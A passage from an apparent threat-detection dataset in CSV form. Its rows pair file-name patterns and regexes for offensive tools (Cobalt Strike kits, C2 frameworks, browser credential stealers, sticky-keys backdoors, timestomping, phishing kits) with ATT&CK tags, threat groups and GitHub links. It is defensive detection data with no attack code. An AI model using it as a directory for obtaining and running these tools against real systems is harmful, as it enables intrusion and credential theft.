SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","11649"
"*/StandIn.exe*",".{0,1000}\/StandIn\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","11650"
"*/StandIn.git*",".{0,1000}\/StandIn\.git.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","11651"
"*/StandIn_Net35.exe*",".{0,1000}\/StandIn_Net35\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","11652"
"*/StandIn_Net45.exe *",".{0,1000}\/StandIn_Net45\.exe\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","11653"
"*/StandIn-1.3.zip*",".{0,1000}\/StandIn\-1\.3\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","1","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","11654"
"*/stardust.x64.exe*",".{0,1000}\/stardust\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","11655"
"*/Stardust/scripts/loader.x64.exe*",".{0,1000}\/Stardust\/scripts\/loader\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","11656"
"*/start.sh dynamic *",".{0,1000}\/start\.sh\sdynamic\s.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","11657"
"*/start_campaign.py*",".{0,1000}\/start_campaign\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","11658"
"*/startProxyPool?k=*&random=n&number=2&ip=*",".{0,1000}\/startProxyPool\?k\=.{0,1000}\&random\=n\&number\=2\&ip\=.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","11659"
"*/startProxyPool?k=*&random=y&number=2*",".{0,1000}\/startProxyPool\?k\=.{0,1000}\&random\=y\&number\=2.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","11660"
"*/startVNC.sh*",".{0,1000}\/startVNC\.sh.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","11661"
"*/StaticSyscallsAPCSpawn/*",".{0,1000}\/StaticSyscallsAPCSpawn\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","11662"
"*/StaticSyscallsInject/*",".{0,1000}\/StaticSyscallsInject\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","11663"
"*/StayKit.cna*",".{0,1000}\/StayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","11664"
"*/Staykit/StayKit.*",".{0,1000}\/Staykit\/StayKit\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","11665"
"*/Stealer.exe*",".{0,1000}\/Stealer\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11667"
"*/Stealer.exe*",".{0,1000}\/Stealer\.exe.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","11668"
"*/Stealer.exe*",".{0,1000}\/Stealer\.exe.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source informations stealer in rust","T1003 - T1083 - T1114 - T1074","TA0006 - TA0009 - TA0005","N/A","N/A","Credential Access","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","1","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","11669"
"*/Stealer.sln*",".{0,1000}\/Stealer\.sln.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","11670"
"*/stext credentials.log*",".{0,1000}\/stext\scredentials\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#linux","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","11671"
"*/stickykey.ps1*",".{0,1000}\/stickykey\.ps1.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","1","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","11672"
"*/Stickykeys.sh*",".{0,1000}\/Stickykeys\.sh.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","11673"
"*/StickyNotesExtract.exe*",".{0,1000}\/StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11674"
"*/StickyNotesExtract.exe*",".{0,1000}\/StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11675"
"*/StickyNotesExtract.exe*",".{0,1000}\/StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11676"
"*/stinger_client.py*",".{0,1000}\/stinger_client\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","11677"
"*/Stompy.git*",".{0,1000}\/Stompy\.git.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","11678"
"*/Stompy.ps1*",".{0,1000}\/Stompy\.ps1.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","11679"
"*/StomPY.py*",".{0,1000}\/StomPY\.py.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","11680"
"*/Stowaway.git*",".{0,1000}\/Stowaway\.git.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","1","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","11681"
"*/stowaway_admin*",".{0,1000}\/stowaway_admin.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","#linux","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","11682"
"*/stowaway_agent*",".{0,1000}\/stowaway_agent.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","#linux","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","11683"
"*/Stracciatella/releases/latest/download/Stracciatella.exe*",".{0,1000}\/Stracciatella\/releases\/latest\/download\/Stracciatella\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","11684"
"*/striker.c",".{0,1000}\/striker\.c","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","11685"
"*/Striker.git*",".{0,1000}\/Striker\.git.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","11686"
"*/striker.local*",".{0,1000}\/striker\.local.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","11687"
"*/striker.py",".{0,1000}\/striker\.py","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","11688"
"*/string_of_paerls.profile*",".{0,1000}\/string_of_paerls\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","11689"
"*/stun-info.nse*",".{0,1000}\/stun\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11690"
"*/stun-version.nse*",".{0,1000}\/stun\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11695"
